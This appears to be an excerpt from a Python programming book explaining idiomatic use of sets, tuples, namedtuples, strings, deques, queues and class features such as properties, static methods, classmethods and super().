In addition, you might run into trouble with how Unicode text is represented; in some cases, you will not be able to take the output from json.dumps() and copy and paste it into a Python interpreter session to reconstruct the original dictionary object. The other classical solution to pretty printing such structured objects in Python is the built-in pprint module. The following is an example of how it can be used:

>>> from pprint import pprint
>>> pprint(config_map)
{'d': {1, 2, 3},
 'name': 'knights_watch',
 'path': '/tmp/',
 'reference': 12648430}

You can see that pprint is able to print data types like sets, and it prints the dictionary keys in a reproducible order. Compared to the standard string representation for dictionaries, what we get here is much easier on the eyes.

However, compared to json.dumps(), it doesn't represent nested structures that well, visually. Depending on the circumstances, this can be an advantage or a disadvantage. The preference is to use json.dumps() to print dictionaries because of the improved readability and formatting, but only if we are sure they are free of non-primitive data types.

A weird expression!?

Let us take a break from all the quirks and optimizations, and see how the following expression in Python will work:

>>> {True: 'yes', 1: 'hell no', 1.0: 'sure'}

What do you think would happen when Python executes this? The output looks like the following: {True: 'sure'}

So, what happened here? The answer to this lies in a very fundamental aspect of the Python language. Let us see what happens when we compare the keys here:

>>> True == 1 == 1.0 True

Python treats Booleans as a subtype of the Integer data type, and the values behave like 0 and 1 in almost all cases, except that when they are converted into their string representations, the strings 'False' or 'True' are returned. This tells us why the values are being overridden.

So, why do the keys not get changed? Well, Python operates on the principle that if a new key compares equal to an existing one, the key object does not need to be updated; only the value is overridden.
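A couple of quick checks in the interpreter make this behaviour concrete (illustrative snippet):

>>> isinstance(True, int)
True
>>> True + True          # behaves like 1 + 1
2
>>> hash(True) == hash(1) == hash(1.0)
True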

Dealing with Python sets

A set is an unordered collection of objects that does not allow duplicate elements. Typically, sets are used to quickly test a value for a membership in the set, to insert or delete the new values from a set, and to compute the union or intersection of two sets.

In a proper set implementation, membership tests are expected to run in fast O(1) time. The union, intersection, difference, and subset operations should take O(n) time on an average. The set implementations included in Python’s standard library follow these performance characteristics.

Just like dictionaries, sets get special treatment in Python and have some syntactic sugar that makes them easy to create. The curly-braces set expression syntax and set comprehensions allow you to conveniently define new set instances:

vowels = {'a', 'e', 'i', 'o', 'u'} squares = {x * x for x in range(10)}

However, what you need to keep in mind is that to create an empty set, you need to call the set() constructor. Using empty curly braces {} is ambiguous and will create an empty dictionary instead.

Understand and use the mathematical set operations

A set can be thought of as a dictionary with keys but no values. The set class also implements the Iterable interface, which means that a set can be used in a for-loop or as the subject of an in statement. For those new to Python, the set data type may not be immediately intuitive in terms of usage.

To better understand sets, you need to dig into their origin in the set theory of mathematics. Understanding the basic mathematical set operations will help you comprehend the proper usage of sets in Python. Even if you are not an ace mathematician, you will do just fine diving into the concepts in this section. A few operations related to two sets A and B are as follows (each is illustrated in the short snippet after this list):

Union: Elements in A, B, or both A and B (Syntax: A | B).

Intersection: Elements common to both A and B (Syntax: A & B).

Difference: Elements in A but not in B (Syntax: A - B, non-commutative).

Symmetric difference: Elements in either A or B, but not both (Syntax: A ^ B).
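A short sketch of all four operations on two example sets (the values are illustrative):

>>> A = {1, 2, 3, 4}
>>> B = {3, 4, 5}
>>> A | B                  # union
{1, 2, 3, 4, 5}
>>> A & B                  # intersection
{3, 4}
>>> A - B                  # difference (non-commutative)
{1, 2}
>>> A ^ B                  # symmetric difference
{1, 2, 5}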

When working with lists of data, a common task is finding the elements that appear in all of the lists. Any time you need to choose elements from two or more sequences based on properties of the sequence membership, you should choose a set. Let us explore some use cases.

The Regular way:

def get_largest_and_fastest_growth_nations():
    large_growth_nations = get_large_growth_nations()
    fast_growth_nations = get_fast_growth_nations()
    large_and_fast_growth_list = []
    for user in large_growth_nations:
        if user in fast_growth_nations:
            large_and_fast_growth_list.append(user)
    return large_and_fast_growth_list

The Pythonic way:

def get_largest_and_fastest_growth_nations():
    return (set(get_largest_growth_nations()) &
            set(get_fastest_growth_nations()))

Set generation with comprehensions

Set comprehensions are an underrated feature. Similar to how a list or dictionary can be generated, you can also use set comprehensions to generate a set. It is syntactically identical to that of dict() comprehension.

The Regular way:

famous_family_names = set()
for person in famous_people:
    famous_family_names.add(person.surname)

The Pythonic way:

famous_family_names = {person.surname for person in famous_people}

The importance of using comprehensions for creating Pythonic data structures cannot be stressed more, especially when the size of the data is considerably large as it not only provides a speedup in performance due to under-the-hood optimizations, but also leads to code that is more readable.

Using sets to determine common list values

This is again an extension of the first concept that we discussed here – the & operator for sets. It helps in finding the common elements between two sets, and this extends to lists as well. The list() and set() constructors also accept sets and lists as arguments, respectively. Based on this, and using the & operator, we can find the intersection. If all you care about is whether elements appear in both lists, you can use the truth value of the resulting non-empty set to create a clear and concise conditional statement.

The Regular way:

red_hair_people = ['Tima', 'Gelo', 'Ahgem'] blue_eyed_people = ['Rihcur', 'Gelo', 'Tikna']

def are_redHair_blueEyed_people_present(
        red_hair_people, blue_eyed_people):
    has_both = False
    for person in red_hair_people:
        if person in blue_eyed_people:
            has_both = True
    return has_both

The Pythonic way:

def are_redHair_blueEyed_people_present(
        red_hair_people, blue_eyed_people):
    return set(red_hair_people) & set(blue_eyed_people)

Eliminating duplicate elements from Iterables

The widely used data structures like lists and dictionaries commonly have duplicate values. Let us take an example of a raffle where people sign up from different cities. If we need a list of all the unique cities, a set would build our solution really well. There are the following three primary aspects of sets that make them the right candidate:

A set can only house unique elements. Adding an existing element to a set is for all purposes “ignored”.

A set can be built from any data structure whose elements are hashable.

With respect to our example, let us first create a set out of the elements we are dealing with. This process gets rid of the duplicates. Now, do we need to convert back to the original list format? Actually, we don't. Assuming our display function is implemented reasonably, a set can be used as a drop-in replacement for a list. In Python, a set, like a list, is an Iterable, and can thus be used in a loop, a list comprehension, and so on, interchangeably.

The regular way:

unique_city_list = []
for city in list_of_cities:
    if city not in unique_city_list:
        unique_city_list.append(city)

The Pythonic way:

unique_city_list = set(list_of_cities)

Creating immutable sets with frozenset

What if you need a set of elements that are unique and constant throughout the execution of the program? To construct a read-only set, we can make use of the frozenset class, which will prevent any modifications on the set. They are essentially static in nature and you can only query on their elements.

One benefit of frozensets is that you can use them as keys in the dictionaries, or as elements of another set, since their immutability makes them hashable. You cannot perform these operations with regular sets. However, like sets, they support all set operations and are not ordered.

>>> subjects = frozenset({'history', 'geography', 'math', 'science'})

>>> subjects.add('commerce')
AttributeError: 'frozenset' object has no attribute 'add'

>>> a_dict = {frozenset({1, 2, 3, 4, 5}): 'something cool'}
>>> a_dict[frozenset({1, 2, 3, 4, 5})]
'something cool'

Frozensets, being immutable, are hashable in nature; hence, we can use them as keys in a dictionary.

Using multisets or bags with collections.Counter

We are one step deeper into sets now. Now, what if we want to maintain the uniqueness of entities, but at the same time want multiple instances of any element in the set to be preserved as well? That is made possible by the collections.Counter class of the standard library, which implements the data structure called the multiset or bag. This is useful in cases where you want to keep track of how many times an element was included in the set, along with its existence in the set:

In [1]: from collections import Counter
        pirate_loot = Counter()
        loot = {"gold": 12, "silver": 10}
        pirate_loot.update(loot)
        pirate_loot.update(loot)   # counts accumulate across updates
        print(pirate_loot)

Counter({'gold': 24, 'silver': 20})

In [2]: another_loot = {"silver": 23, "bronze": 5}
        pirate_loot.update(another_loot)
        print(pirate_loot)

Counter({'silver': 43, 'gold': 24, 'bronze': 5})

The crux of the Counter class is how we get the element counts. If you check the length of the object, it returns the number of

unique elements in the multiset object. If you want to retrieve the total number of elements, you must use the sum function.

In [3]: len(pirate_loot)
3

In [4]: sum(pirate_loot.values())
72

Sets are most useful when it comes to the removal of duplicate elements and maintaining collection of unique elements. The features discussed here should help you get a deeper view into the uses and features of sets in Python.

Tuple tricks

The tuple is a very flexible and extremely useful data structure in Python. Similar to lists, they are also sequences. They differ from lists in the way that tuples are immutable. Although tuples are less popular than lists, they are a fundamental data type, which are even used internally in the core Python language. Despite not noticing, you are using tuples in the following situations:

Working with parameters and arguments in functions. Returning multiple items from a function.

Iterating over key-value pairs of a dictionary.

Using string formatting.

Write clearer tuples with namedtuple

When dealing with APIs for logically arranged spreadsheet-like data, most return values, especially the multi-row ones, are in the form of lists or tuples.

In such implementations, elements at a particular index represent something logical and meaningful. When dealing with larger data sets, remembering which index corresponds to which logical field is tedious and rather confusing, not to mention error prone. That is where the namedtuple from the collections module comes into play. A namedtuple is like a normal tuple that provides the added advantage of accessing the fields by names rather than indices. The collections.namedtuple enhances the readability and maintainability of the code. The named tuples will also remind you of the simple structure representation of C++, and would fit well in most of the use cases.

In [1]: from collections import namedtuple
        Car = namedtuple('Car', 'color mileage')
        'color mileage'.split()

['color', 'mileage']

In [2]: my_car = Car('red', 3812.4)
        print(my_car.color, my_car[0])

red red

In [3]: color, mileage = my_car
        print(color, mileage)

red 3812.4

Because they are built on top of regular classes, you can even add methods to a namedtuple’s class. For example, you can extend the class like any other class and add methods and new properties to it that way.

In [4]: Car = namedtuple('Car', 'color mileage')
        class MyCarWithMethods(Car):
            def hexcolor(self):
                if self.color == 'red':
                    return '#ff0000'
                else:
                    return '#000000'

In [5]: c = MyCarWithMethods('red', 1234)
        c.hexcolor()

'#ff0000'

It is evident that going from ad-hoc data types like dictionaries with a fixed format to namedtuples helps express the developer's intentions more clearly. Sometimes, when we attempt this refactoring, we magically come up with a better solution for the problem at hand. Using namedtuples over unstructured tuples and dicts can also make your colleagues' lives easier, because they make the data being passed around "self-documenting" to some extent. Use them with caution though!

Unpacking data using tuples

Python is one of the languages that support multiple assignments in a statement. It also allows ‘unpacking’ of the data using Tuples (similar to the destructuring bind for those familiar with LISP).

The regular way:

csv_file_row = ['Carle', '[email protected]', 27]
name = csv_file_row[0]
email = csv_file_row[1]
age = csv_file_row[2]
output = ("{}, {}, {} years old".format(name, email, age))

The Pythonic way:

csv_file_row = ['Carle', '[email protected]', 27]
(name, email, age) = csv_file_row
output = ("{}, {}, {} years old".format(name, email, age))

Ignore tuple data with the ‘_’ placeholder

When dealing with returned function values as tuples, or assigning a tuple equal to some data, sometimes not all the fields are required or need assignment. So, instead of creating unused variables and confusing future readers, the _ can be used as a placeholder for the discarded data.

The regular way:

# Using confusing unused names
(name, age, temp, temp2) = get_info(person)
if age > 21:
    output = '{name} can drink!'.format(name=name)

The Pythonic way:

# Only interesting fields are named
(name, age, _, _) = get_user_info(user)

Return multiple values from functions using tuples

Sometimes, functions warrant the need to return multiple values. I have seen a good amount of Python code written by novices that twists itself into knots trying to get around the incorrect assumption that a function can only return one logical value. Now, while it is true that functions can return one value, this value can be any valid object – the most ideal of them being tuples. You will see this pattern of returning values in most places in the standard library or external packages.

from collections import Counter

def collect_stats(list_of_values):
    average = float(sum(list_of_values) / len(list_of_values))
    ptile50 = list_of_values[int(len(list_of_values) / 2)]
    mode = Counter(list_of_values).most_common(1)[0][0]
    return (average, ptile50, mode)
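A typical call site simply unpacks the returned tuple (a usage sketch with made-up values):

average, median, mode = collect_stats([3, 5, 5, 9, 13])
print(average, median, mode)   # 7.0 5 5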

Namedtuples with advanced features with typing.NamedTuple

The typing.NamedTuple construct instantiates a subclass equivalent to that of collections.namedtuple; however, it also records field defaults and type annotations (via attributes such as _field_defaults and __annotations__) on the class. The generated object will behave in the same manner, and might add some additional feature support in your IDE. The class from the typing module provides a more natural interface: you can directly customize the type by adding a docstring or some additional methods. As before, the class will be a subclass of tuple, and instances will be instances of tuple as usual, NOT of typing.NamedTuple.

Since typing.NamedTuple is a class, it uses a metaclass and a custom __new__ to handle the annotations, and then it delegates to collections.namedtuple anyway to build and return the type. As evident from the lowercased naming convention, collections.namedtuple is not a type/class; rather, it is a factory function, which operates by constructing a string of code and subsequently calling exec on the string. The generated constructor is plucked out of a namespace and included in a 3-argument invocation of the metaclass type to build and return your class. typing.NamedTuple, in contrast, uses its own metaclass to instantiate the class object. typing.NamedTuple also allows an easier interface to pass defaults, which was otherwise achieved with collections.namedtuple by subclassing the generated type.

In [1]: from typing import NamedTuple

        class Car(NamedTuple):
            color: str
            mileage: float
            automatic: bool

        car1 = Car('red', 3812.4, True)
        print(car1)
        print(car1.mileage)

Car(color='red', mileage=3812.4, automatic=True)
3812.4

In [2]: # Immutable fields
        car1.mileage = 23

AttributeError: can't set attribute

In [3]: car1 = Car('red', 'NOT_A_FLOAT', 99)
        car2 = Car(color='red', mileage='NOT_A_FLOAT', automatic=99)
        print(car1, '\n', car2)

Car(color='red', mileage='NOT_A_FLOAT', automatic=99)
Car(color='red', mileage='NOT_A_FLOAT', automatic=99)
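Since the discussion above mentions passing defaults, here is a minimal sketch of how default values look with typing.NamedTuple (the fields are illustrative):

from typing import NamedTuple

class Car(NamedTuple):
    color: str
    mileage: float = 0.0      # fields with defaults must come after those without
    automatic: bool = False

print(Car('red'))
# Car(color='red', mileage=0.0, automatic=False)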

Tuples are an undervalued data structure in Python that often goes unnoticed next to lists, but they have immense utility owing to their data aggregation role and their usage in the internal constructs of the language.

Handling strings better

Strings are amongst the most popular types in Python. We can create them simply by enclosing characters in quotes. Python treats single quotes the same way as double quotes. Creating strings is as simple as assigning a value to a variable. Python does not support a character type; these are treated as strings of length one, thus also considered a substring.

Create a single string from list elements with ''.join()

Using the join operation to create a string out of a list of elements is faster, uses less memory, and is a very common practice. Note that the join method is called on the delimiter, which is represented as a string; a zero-length delimiter will simply concatenate the strings.

The regular way:

list_of_str = ['Syntax Error', 'Network Error', 'File not found']
concat_string = ''
for substring in list_of_str:
    concat_string += substring

The Pythonic way:

list_of_str = ['Syntax Error', 'Network Error', 'File not found']
concat_string = ''.join(list_of_str)

Enhance clarity by chaining string functions

Here is where fine balance comes in. If you have a few transformations to perform using string functions, it is better to chain them as a sequence, rather than using a temporary variable at every stage. This will make the code more readable and efficient. However, excessive chaining may also lead to a reduction in code readability. Therefore, it is up to the developer to judge when to batch the chainings separately. I personally follow a “triple link chain” rule for limiting the number of chaining at each step to three.

The regular way:

title_name = ' The Pythonic Way : BPB Publications'
formatted_title = title_name.strip(" ")
formatted_title = formatted_title.upper()
formatted_title = formatted_title.replace(':', ' by')

The Pythonic way:

title_name = ' The Pythonic Way : BPB Publications'
formatted_title = title_name.strip(" ").upper().replace(':', ' by')

Use the format function for constructing strings

Mixing or constructing strings in Python can be done in the following three ways:

Using the + operator to concatenate strings and variables.

Using the conventional string formatter, using the % operator to substitute values similar to printf in other languages. Using the format function on the string.

The first two are less expressive and suboptimal in some cases. The clearest and most idiomatic way to format strings is to use the format function. This supports passing a format string and replacing the placeholders with values. We can also use named placeholders, access attributes, have control over the string width or padding, and some other features. This results in a clean and concise approach. Although, with Python 3+, the formatted string representation could also be preferred, as discussed in the previous chapter.

The Regular way:

def get_formatted_string_type_one(person):
    # Tedious to type and prone to conversion errors
    return 'Name: ' + person.name + ', Age: ' + \
           str(person.age) + ', Sex: ' + person.gender

def get_formatted_string_type_two(person):
    # No connection b/w the format string placeholders
    # and values to use. Why know the type then?
    # Don't these types all have __str__ functions?
    return 'Name: %s, Age: %i, Sex: %c' % (
        person.name, person.age, person.gender)

The Pythonic way:

def get_formatted_string_type_three(person):
    return ('Name: {person.name}, Age: {person.age}, '
            'Sex: {person.gender}'.format(person=person))

Working with ASCII codes using ord and chr

Python has two often-overlooked built-in functions, ord and chr, that are used to perform translations between a character and its ASCII character code representation.
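For instance, the round trip between a character and its code point is straightforward (a quick illustrative check); the snippet that follows then uses ord to build a naive string hash:

>>> ord('A')
65
>>> chr(65)
'A'
>>> chr(ord('A') + 1)
'B'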

def naive_string_hash(some_string):
    # A naive hash built from the character codes of the string
    hash_value = 0
    for e in some_string:
        hash_value += ord(e)
    return hash_value

Strings in Python are an important part of the language, and with the advent of Python 3, there are several improvements in the way in which strings are implemented and used in programs.

Other data structure trivia

Data structures are a way of storing and organising data, so that they can be accessed and worked with, in an efficient manner. They define the relationship between data and the operations that can be performed on the data. In this section, we will look at some of the lesser known facts about Python Data Structures.

Creating serialized C structs with struct.Struct

Remember structs in C++? The Python standard library comes with the struct.Struct class, which converts between Python values and C structs serialized into Python bytes objects. We can use it to handle streaming network traffic or binary data stored in files.

It is not preferred to use serialized structs to store or manage the data objects, which are meant to be purely used inside Python code. Rather, they are intended to be used as a format for data exchange. Using serialized structs to package the primitive data is more memory efficient than other data types. However, in most cases, this would be unnecessary and an over-optimization for trivial problems.

In [1]: from struct import Struct
        MyStruct = Struct('i?f')
        data = MyStruct.pack(23, False, 42.0)
        print(data)

b'\x17\x00\x00\x00\x00\x00\x00\x00\x00\x00(B'

In [2]: MyStruct.unpack(data)

(23, False, 42.0)

Attribute defaults with types.SimpleNamespace

The types.SimpleNamespace is a shortcut choice for creating data objects in Python. Added in Python 3.3 and later, it provides attribute access to its namespace and exposes all of its keys as class attributes. All instances also include a meaningful __repr__ by default. This provides the following advantages over an empty class:

It allows you to initialize the attributes while constructing the object: sn = SimpleNamespace(a=1, b=2).

It provides a readable repr, such that eval(repr(sn)) == sn.

It overrides the default comparison: instead of comparing by id(), it compares the attribute values instead.

The types.SimpleNamespace translates roughly to the following:

class SimpleNamespace:
    def __init__(self, **kwargs):
        self.__dict__.update(kwargs)

    def __repr__(self):
        keys = sorted(self.__dict__)
        items = ("{}={!r}".format(k, self.__dict__[k]) for k in keys)
        return "{}({})".format(type(self).__name__, ", ".join(items))

    def __eq__(self, other):
        return self.__dict__ == other.__dict__

In short, types.SimpleNamespace is just an ultra-simple class, allowing you to set, change, and delete attributes while it also provides a nice repr output string. The attributes can be added, modified, and deleted freely. I sometimes use this as an easier-to-read-and-write alternative; moreover, I subclass it to get the flexible instantiation and repr output for free.

In [1]: from types import SimpleNamespace
        data = SimpleNamespace(a=1, b=2)
        print(data)

namespace(a=1, b=2)

In [2]: data.c = 3
        print(data)

namespace(a=1, b=2, c=3)

Implement speedy and robust stacks with collections.deque

The deque class in the Python standard library collections framework implements a double-ended queue, supporting insertions and deletions from both ends in non-amortized O(1) time. You can use these data structures as both queues and stacks, given the double-ended operations. Internally, the deques in Python are implemented as doubly linked lists, which maintain consistent performance for insertion and removal operations, but offer only O(n) performance for random access of intermediary elements.

In [1]: from collections import deque
        stack = deque()
        stack.append('eat')
        stack.append('pray')
        stack.append('love')
        print(stack)

deque(['eat', 'pray', 'love'])

In [2]: print(stack.pop())
'love'

In [3]: print(stack.pop())
'pray'

In [4]: print(stack.pop())
'eat'

In [5]: stack.pop()
IndexError: "pop from an empty deque"

Implement fast and robust queues with collections.deque

As discussed, the deque class implements a double-ended queue that supports adding and removing elements from either end in amortized O(1) time. In addition, since they are linked list based implementations, they can be used as both stacks and queues. Let us take a look at how a queue would be used:

In [1]: from collections import deque
        queue = deque()
        queue.append('eat')
        queue.append('pray')
        queue.append('love')
        print(queue)

deque(['eat', 'pray', 'love'])

In [2]: queue.popleft()
'eat'

In [3]: queue.popleft()
'pray'

In [4]: queue.popleft()
'love'

In [5]: queue.popleft()
IndexError: "pop from an empty deque"

Parallel compute lock semantics with queue.Queue

The Queue module provides a FIFO implementation suitable for multi-threaded programming. It can be used to pass messages or other data between the producer and the consumer threads safely. Locking is handled for the caller, so it is simple to have as many threads as you want working with the same Queue instance. A Queue's size (number of elements) may be restricted to throttle the memory usage or processing.

In [1]: from queue import Queue
        simpleq = Queue()
        simpleq.put('eat')
        simpleq.put('pray')
        simpleq.put('love')
        print(simpleq)

<queue.Queue object at 0x1070f5b38>

In [2]: simpleq.get()
'eat'

In [3]: simpleq.get()
'pray'

In [4]: simpleq.get()
'love'

In [5]: simpleq.get_nowait()
queue.Empty

In [6]: simpleq.get()   # Continuously blocks / waits…

Parallel compute lock semantics with queue.LifoQueue

In contrast to the standard FIFO implementation of Queue, the LifoQueue uses the last-in, first-out ordering (normally associated with a stack data structure).

It provides locking semantics to support multiple concurrent producers and consumers. Besides this, the queue module contains several other classes that implement multi-producer/multi-consumer queues, which are useful for parallel computing. Depending on your use case, the locking semantics might be helpful, or they might just incur unneeded overhead. In such cases, you would be better off using a list or a deque as a general-purpose stack.

In [1]: from queue import LifoQueue
        squeue = LifoQueue()
        squeue.put('eat')
        squeue.put('pray')
        squeue.put('love')
        print(squeue)

<queue.LifoQueue object at 0x0106E8F0>

In [2]: print(squeue.get())
'love'

In [3]: print(squeue.get())
'pray'

In [4]: print(squeue.get())
'eat'

In [5]: print(squeue.get())   # This is a blocking call and will run forever

Using shared job queues using multiprocessing.Queue

The multiprocessing package supports spawning processes using an API similar to the threading module. The multiprocessing package offers both local and remote concurrency, effectively sidestepping the Global Interpreter Lock by using subprocesses instead of threads. Due to this, the multiprocessing module allows the programmer to fully leverage multiple processors on a given machine. It runs on both Unix and Windows. The multiprocessing module also introduces APIs which do not have analogs in the threading module. A prime example of this is the Pool object, which offers a convenient means of parallelizing the execution of a function across multiple input values, distributing the input data across processes (data parallelism). This is a shared job queue implementation that allows the queued items to be processed in parallel by multiple concurrent workers. Process-based parallelization is popular in CPython due to the global interpreter lock that prevents some forms of parallel execution on a single interpreter process.

As a specialized queue implementation, meant for sharing data between processes, multiprocessing.Queue makes it easier to distribute the work across multiple processes in order to work around the GIL limitations. This type of queue can store and transfer any pickle-able object across the process boundaries.

In [1]: from multiprocessing import Queue
   ...: multiq = Queue()
   ...: multiq.put('eat')
   ...: multiq.put('pray')
   ...: multiq.put('love')
   ...: print(multiq)

<multiprocessing.queues.Queue object at 0x0158E750>

In [2]: multiq.get()
'eat'

In [3]: multiq.get()
'pray'

In [4]: multiq.get()
'love'

In [5]: multiq.get() # Continuously blocks / waits…
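To see the queue actually shared between processes, here is a minimal sketch; the worker function, the pool of two processes, and the None sentinel are assumptions made for this example:

from multiprocessing import Process, Queue

def worker(jobs, results):
    while True:
        item = jobs.get()
        if item is None:              # sentinel: no more work for this process
            break
        results.put(item.upper())     # stand-in for real processing

if __name__ == '__main__':
    jobs, results = Queue(), Queue()
    workers = [Process(target=worker, args=(jobs, results)) for _ in range(2)]
    for p in workers:
        p.start()
    for word in ['eat', 'pray', 'love']:
        jobs.put(word)
    for _ in workers:
        jobs.put(None)                # one sentinel per worker process
    for _ in range(3):
        print(results.get())          # collect one result per job
    for p in workers:
        p.join()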

Using list based binary heaps with heapq

This module provides an implementation of the heap queue algorithm, also known as the priority queue algorithm. Heaps are binary trees for which every parent node has a value less than or equal to any of its children. This implementation uses zero-indexed lists that maintain the invariant heap[k] <= heap[2*k+1] and heap[k] <= heap[2*k+2] for all k, so the smallest element is always heap[0].

Encapsulation with the property decorator

Consider the following interactive session with a class, Demcapsulation, whose alpha attribute is exposed through the property decorator:

>>> myObj = Demcapsulation()
>>> myObj.alpha = 'Python'
>>> myObj.alpha
'Accessing the value: Python has been updated!'

The property decorator is the accessory that avoids many encapsulation mistakes. Here it changes how the alpha attribute is implemented without violating any encapsulation. The property decorator, when used to wrap around a function, transforms it into a getter. Without it, the function would have to be invoked as myObj.alpha(); with the property decorator, it behaves as a simple attribute or property of the class and can be accessed with myObj.alpha directly. Similarly, a method can be turned into a setter by applying the @alpha.setter decorator on it. Without the setter, the property cannot be edited and will raise an AttributeError if an update is attempted. You can achieve exceptionally clean code by making proper use of the property decorator alongside getters and setters, leading to quick and succinct code development.
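As a minimal sketch of what such a class might look like (the internal _alpha attribute and the exact message strings are inferred from the interactive session above, not taken from a full listing):

class Demcapsulation:
    def __init__(self):
        self._alpha = None                 # internal storage behind the property

    @property
    def alpha(self):                       # getter: runs on myObj.alpha
        return f"Accessing the value: {self._alpha}"

    @alpha.setter
    def alpha(self, value):                # setter: runs on myObj.alpha = ...
        self._alpha = f"{value} has been updated!"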

When to use static methods?

Static methods are methods defined within the class structure that do not depend on or make use of the self or cls references. They work independently and can be run without instantiating the class. Static methods do not have access to the state of the class. So, when and how should we use static methods?

When implementing a class, sometimes there are computational or helper methods, which are standalone formulations that can operate without any dependency on the class state. For example, the mathematical formulae, conversion methods, serialization, or archival operations. Yes, you could argue moving these functions out of the class, but it makes more sense to aggregate all the methods needed by the class in the class itself. The following is a simple example of the same:

Without using @staticmethod:

def get_radius_from_diameter(diameter):
    return diameter / 2

class CircleArea:
    VALUE_OF_PI = 3.141

    def __init__(self, radius, color):
        self.radius = radius
        self.color = color

    @property
    def total_area(self):
        # area = pi * r^2
        return self.radius * self.radius * self.VALUE_OF_PI

Here, the method to get the radius from the diameter should work even without the CircleArea class, even though it is related.

With @staticmethod:

class CircleArea:
    VALUE_OF_PI = 3.141

    def __init__(self, radius, color):
        self.radius = radius
        self.color = color

    @property
    def total_area(self):
        # area = pi * r^2
        return self.radius * self.radius * self.VALUE_OF_PI

    @staticmethod
    def get_radius_from_diameter(diameter):
        return diameter / 2

When it is put into the same class, it can still be invoked directly, without using the class methods or variables; hence, we make it static to show that it is related to the class.

You can house utility functions within a library, or in a class as a static function, if the function is falling under the objective of the class. A built-in example of a static method is str.maketrans() in Python 3, which was a function in the string module in Python 2.

Using classmethod decorator for state access

Unlike static methods, class methods are defined with the class itself (conventionally named cls) as their first parameter. They also give you the flexibility to create alternative constructors, other than the __init__ method, and provide the easiest mechanism for implementing a factory pattern in Python.

Let us write a serializer class, where the input is supplied in multiple formats. In the following example, we will be serializing a Car object and return the make and model of the car. The challenge, in this case, is that we have to expose a simple API for the user to be able to input the data in the form of a file, or string, or object, or JSON message. To solve this, the factory pattern comes to mind as a suitable approach, and we will be using classmethods for implementation:

class Car:
    def __init__(self, car_make, car_model):
        self.car_make = car_make
        self.car_model = car_model

    @classmethod
    def from_string_input(cls, make_and_model_str):
        make, model = make_and_model_str.split(" ", 1)
        car = cls(make, model)
        return car

    @classmethod
    def from_json_input(cls, make_and_model_json):
        # parse make and model from json object…
        return car

    @classmethod
    def from_file_input(cls, make_and_model_file):
        # read file and get make and model…
        return car

data = Car.from_string_input("Honda City")
data = Car.from_json_input(some_json_object)
data = Car.from_file_input("/tmp/car_details.txt")

Note that as per PEP8, self should be used for first argument to the Instance methods and cls should be used for first argument to the class methods.

Here, the Car class is constructed with several class methods, each of which presents a simple API to any deriving class, in order to create or access the class state based on the input format. Class methods are beneficial when working on large-scale modular projects, which need simple, easy-to-use interfaces for long-term maintainability.

Choosing between public and private Attributes

Python does not have a clearly defined or strict concept of public and private access specifiers. However, there is a universally accepted convention to designate entities as private: beginning the variable or method name with a single leading underscore (_). The variable can still be accessed; however, doing so is conventionally frowned upon. Using this convention is helpful, but overusing it can make the code brittle and cumbersome. Let us consider a case where we have a Car class, which has the make and model stored as a private instance variable. To access it, we have a getter function that exposes the variable.

Using _ for private names will look like the following:

class Car:
    def __init__(self, car_make, car_model):
        self._make_and_model = f"{car_make} {car_model}"

    def get_make_model(self):
        return self._make_and_model

per = Car("Honda", "City")
assert per.get_make_model() == "Honda City"

However, this is still not the ideal way of creating private variables, given that it goes against the founding constructs of the language. In addition, if there are too many private variables, it will increase the complexity of your code.

It is also recommended to use the __ (double underscore) prefix for names when inheriting from public classes whose entities we cannot control. The double underscore triggers name mangling, which helps avoid naming conflicts in the code.

Using ‘__’ in Inheritance of a Public Class will look like the following:

class Car:
    def __init__(self, car_make, car_model):
        self._make_and_model = f"{car_make} {car_model}"
        self.year_of_mfg = 2010

    def get_make_model(self):
        return self._make_and_model

class Sedan(Car):
    def __init__(self, car_make, car_model):
        super().__init__(car_make, car_model)
        self.__year_of_mfg = 2009   # stored as _Sedan__year_of_mfg after name mangling

sdn = Sedan('Volkswagen', 'Polo')
print(sdn.year_of_mfg)            # 2010, the attribute set by the base class
print(sdn._Sedan__year_of_mfg)    # 2009, the mangled name avoids clashing with the base class

Given that Python does not enforce access restrictions, marking a variable or method as private communicates to the calling code that it should not be overridden or accessed directly.

Using is vs == for comparing objects

When I was growing up, a neighbour had twin boys. They had striking resemblance and looked almost identical – the same blue eyes, height, and hairstyle. Some anger issues and birthmarks aside, it was very difficult to visually tell them apart. They were different people even though they seemed the same. This situation holds for the difference between ‘equal’ and ‘identical’. Understanding this is a precursor to seeing the difference between is and == operators for comparison.

The “==” operator checks for equality. The “is” operator checks for identities.

In the preceding situation, if we were to compare the twins using the == operator, the result would be True: the two boys are equal. However, if the is operator were used to compare them, the result would be False: the two boys are different people. Hopefully, the analogy clarifies the high-level difference between the two operators. Now, let us look at some code to understand this better.

First, let us create some data to use for comparison:

>>> alpha = [10, 21, 13]
>>> beta = alpha

If we print the following in the interactive shell, we do not see any difference between them:

>>> alpha
[10, 21, 13]

>>> beta
[10, 21, 13]

Since both are visually the same, when we use the == operator to compare them, the comparison evaluates to True:

>>> alpha == beta
True

However, it does not mean that alpha and beta are pointing to the same object internally. In this case, since we assigned them, they have the same object reference. However, what if we did not know the source of the objects? How then, do we make sure? The is operator achieves the following:

>>> alpha is beta
True

Let us create a third object by copying the list that we initially created:

>>> delta = list(alpha)
>>> delta
[10, 21, 13]

Now, this is where it gets interesting. Let us execute the same comparisons and see the results:

>>> alpha == delta
True

This tells us that Python deems alpha and delta as equal, since they possess the same contents. However, are they actually the same underlying object?

>>> alpha is delta
False

Therefore, even if they look identical, behind the scenes, they are very different objects and the is operator enforces that check. So, to summarize, the differences we notice between the two operators are as follows: The is operator evaluates to True if both operands are references to the same or identical object.

The == operator evaluates the expression to True if the operands are of the same type and have the same contents, that is, they visually look the same. Fall back to the twin analogy when in doubt, and you’ll be able to decide when to use which operator in Python for checking equality.

super() powers in Python

Python may not be purely an object-oriented language; however, it is power packed with all the ammunition you need to build your software and applications, using object-oriented design patterns. One of the ways in which this is achieved is the support for inheritance using the super() method. This method, as in all languages, lets you access the superclass’s entities from the derived class itself. The super() method returns a reference to an instance of the parent class, which you can use to call the base class’s methods. The common use case is building classes that extend the functionality of previously built classes. You will be saving time on having to rewrite the methods that are already implemented in the base class.

How to use super() effectively

A basic use case of creating a subclass from a pre-defined Python 3 class is illustrated as follows:

import logging

class InfoLogger(dict):
    def __setitem__(self, key, value):
        logging.info('Setting %r to %r', key, value)
        super().__setitem__(key, value)

The preceding class has all the properties of the parent dict class, but we have updated the __setitem__ function to log on every update. The super() call ensures that the dictionary update work of the parent class is delegated accordingly after the logging.

